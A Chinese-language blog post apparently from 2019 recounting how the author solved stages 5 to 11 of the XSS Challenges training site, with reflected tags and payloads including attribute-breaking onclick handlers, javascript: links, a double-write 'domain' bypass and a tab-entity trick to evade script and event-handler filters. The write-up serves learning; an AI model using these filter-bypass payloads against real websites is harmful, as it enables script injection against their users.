<!DOCTYPE html>
<html lang="zh-cmn-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>XSS challengs5-11通过过程 | Joner</title>
  
  
  
  <!--link rel="stylesheet" href="//cdn.jsdelivr.net/highlight.js/9.10.0/styles/github-gist.min.css"-->
  <link rel="stylesheet" href="//cdn.jsdelivr.net/highlight.js/9.10.0/styles/github-gist.min.css">
  <link rel="stylesheet" href="/css/style.css">
</head>

<body>
<div class="Shell">
    <aside class="SideBar">
    <section class="avatar" style="background-image: url(/assets/back.jpg)">
        <div class="av-pic" style="background-image: url(/assets/head.jpg)">
        </div>
    </section>
    <section class="menu">
        <div>Joner</div>
        
        <ul>
          
            <a href="/" class="Btn">
              <li>Home</li>
            </a>  
          
            <a href="/archives/" class="Btn">
              <li>Archive</li>
            </a>  
          
        </ul>
    </section>
    <section class="media">
        
    </section>
</aside>

    <div class="container">
        <div data-pager-shell>
            <div>
  <article class="ContentView">
    <header class="PageTitle">
        <h1>XSS challengs5-11通过过程</h1>
    </header>

    <section>
      <p>下面主要记录的是 XSS challenges 第5-11关的通关过程，其中一些步骤在之前写过，所以写的比较简略。</p>
<a id="more"></a>
<h3 id="stage-5"><a href="#stage-5" class="headerlink" title="stage #5"></a><a href="http://xss-quiz.int21h.jp/stage--5.php?sid=a7db383ee4c336fe3151d2e5be674219c5efdf13" target="_blank" rel="noopener">stage #5</a></h3><p>回显搜索结果处的标签为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">maxlength</span>=<span class="string">"15"</span> <span class="attr">size</span>=<span class="string">"30"</span> <span class="attr">value</span>=<span class="string">"123"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试构造</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">"sss"</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>输入时发现只能输入15个字符，所以修改<code>maxlength</code>的值，这个是限制输入框中字符的最大数量值，这里将它的值改为100，再输入后提交，出现弹框，修改js语句，获得下一关地址。</p>
<h3 id="stage-6"><a href="#stage-6" class="headerlink" title="stage #6"></a><a href="http://xss-quiz.int21h.jp/stage-no6.php?sid=97c56f4090765853dd5c6d22383fd4ca89a96fc6" target="_blank" rel="noopener">stage #6</a></h3><p>回显搜索结果处的标签为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">"123"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试构造</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">"sss"</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>提交后没有反应，查看标签处的内容</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">""</span> &amp;<span class="attr">gt</span>;&amp;<span class="attr">lt</span>;<span class="attr">script</span>&amp;<span class="attr">gt</span>;<span class="attr">alert</span>("<span class="attr">sss</span>")&amp;<span class="attr">lt</span>;=<span class="string">""</span> <span class="attr">script</span>&amp;<span class="attr">gt</span>;"=<span class="string">""</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>发现&lt; &gt;被过滤了，所以使用新的xss攻击语句</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">" onclick=alert(document.domain) id="a</span><br></pre></td></tr></table></figure>
<p>这个会在提交后，点击搜索框时运行，点击后出现下一关的地址。</p>
<h3 id="stage-7"><a href="#stage-7" class="headerlink" title="stage #7"></a><a href="http://xss-quiz.int21h.jp/stage07.php?sid=c85097c5d4a2d1287ddab0817c7252f36462dad8" target="_blank" rel="noopener">stage #7</a></h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">"123"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试使用</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">" onclick=alert("sss") id="a</span><br></pre></td></tr></table></figure>
<p>点击搜索框，获得下一关的地址</p>
<h3 id="stage-8"><a href="#stage-8" class="headerlink" title="stage #8"></a><a href="http://xss-quiz.int21h.jp/stage008.php?sid=c33f00522deef0398a2911b64d8ea6597836912f" target="_blank" rel="noopener">stage #8</a></h3><p>这一关输入搜索内容后会转换为<code>url</code>地址，标签处的内容为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"123"</span>&gt;</span>123<span class="tag">&lt;/<span class="name">a</span>&gt;</span>"<span class="tag">&lt;</span></span><br></pre></td></tr></table></figure>
<p>这里的搜索结果放在<code>&lt;a&gt;</code>标签中，这里利用javascript:伪协议在a标签的使用,点击链接后，会执行相应语句，</p>
<p>所以输入</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert("sss")</span><br></pre></td></tr></table></figure>
<p>更改js语句，获得下一关的地址</p>
<h3 id="stage-9"><a href="#stage-9" class="headerlink" title="stage #9"></a><a href="http://xss-quiz.int21h.jp/stage_09.php?sid=a598b00466af6da5be82571504f35feda607285c" target="_blank" rel="noopener">stage #9</a></h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">"123"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"charset"</span> <span class="attr">value</span>=<span class="string">"euc-jp"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试修改p1和下面那个隐藏的输入框的值，没有任何反应，尝试抓包，发现提交两个值<code>p1=1&amp;charset=euc-jp</code></p>
<p>所以尝试修改<code>charset</code>的值，试了之后也不行，查网上的一些解法，说是需要使用IE7 环境 UTF-7编码。</p>
<p>这里没继续尝试，因为IE7已经是很久前的版本了，在控制台输入 <code>alert(document.domain);</code>得到下一关地址</p>
<h3 id="stage-10"><a href="#stage-10" class="headerlink" title="stage # 10"></a><a href="http://xss-quiz.int21h.jp/stage00010.php?sid=f561b6546dddb613477defb74f2a1b1159ea657d" target="_blank" rel="noopener">stage # 10</a></h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">"12"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>然后直接输入</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">"sss"</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>直接出现了弹窗，感觉有点简单，之后修改语句为 <code>alert(document.domain);</code>果然出现了问题，页面没有出现下一关地址，剩下了<code>&gt;&lt;script&gt;alert(document.);&lt;/script&gt;</code>可能是过滤了关键字，缺少了domain，这道题的提示是<code>s/domain//g;</code></p>
<p>这应该是正则表达式，替换domain为空，所以使用双写绕过试试</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">" onclick=alert(document.domdomainain);//</span><br></pre></td></tr></table></figure>
<p>获得下一关的地址</p>
<h3 id="stage-11"><a href="#stage-11" class="headerlink" title="stage #11"></a><a href="http://xss-quiz.int21h.jp/stage11th.php?sid=f0bffd6a02f65762180242616c887ba677f247d5" target="_blank" rel="noopener">stage #11</a></h3><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">"123"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>尝试构造</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">"sss"</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">以及</span><br><span class="line">" onclick=alert("sss");//</span><br></pre></td></tr></table></figure>
<p>提交后的内容为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;<span class="tag">&lt;<span class="name">xscript</span>&gt;</span>alert(</span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"p1"</span> <span class="attr">size</span>=<span class="string">"50"</span> <span class="attr">value</span>=<span class="string">""</span> <span class="attr">onxxx</span>=<span class="string">"alert(&amp;quot;sss&amp;quot;);//&amp;quot;"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>可以看到这里对关键词语进行了处理，这一关的提示是<code>&quot;s/script/xscript/ig;&quot; and &quot;s/on[a-z]+=/onxxx=/ig;&quot; and &quot;s/style=/stxxx=/ig;&quot;</code>可以看出对<code>script</code>、<code>on事件</code>、<code>style</code>等进行了处理，,于是想到将某个字符转换为unicode编码</p>
<p>,或者插入<code>&amp;#x09;</code>不可见字符，并且使用<code>&lt;a&gt;</code>标签，于是构造这样的payload</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"&gt;<span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascr&amp;#09;ipt:alert(document.domain);"</span>&gt;</span>12<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>获得下一关<a href="http://xss-quiz.int21h.jp/stage_no012.php?sid=2b8d7ade9b1ca3e8251e407d50aca3a52d176145" target="_blank" rel="noopener">地址</a></p>


      

    </section>
    
      <section class="ArticleMeta">
          <div>
            发布于&nbsp;
            <time datetime="2019-03-31T11:59:40.000Z" itemprop="datePublished">
              2019-03-31
            </time>
          </div>
          
            <div>
              tags: 
  <li class="meta-text">
  { <a href="/tags/XSS/">XSS</a> }
  </li>

  <li class="meta-text">
  { <a href="/tags/XSS-challenges/">XSS challenges</a> }
  </li>


            </div>
          
      </section>
    
    
</article>

  
</div>

            <footer>
    <div>© 2019 - Joner </div>
    <div>
        <span>
            Powered by <a href="https://hexo.io">Hexo</a>
        </span>
        ,
        <span>
            Theme - <a href="https://github.com/nameoverflow/hexo-theme-icalm">Icalm</a>
        </span>
    </div>
</footer>

        </div>
    </div>
</div>
<script src="/js/pager/dist/singlepager.js"></script>
<script>
var sp = new Pager('data-pager-shell')

</script>
</body>
</html>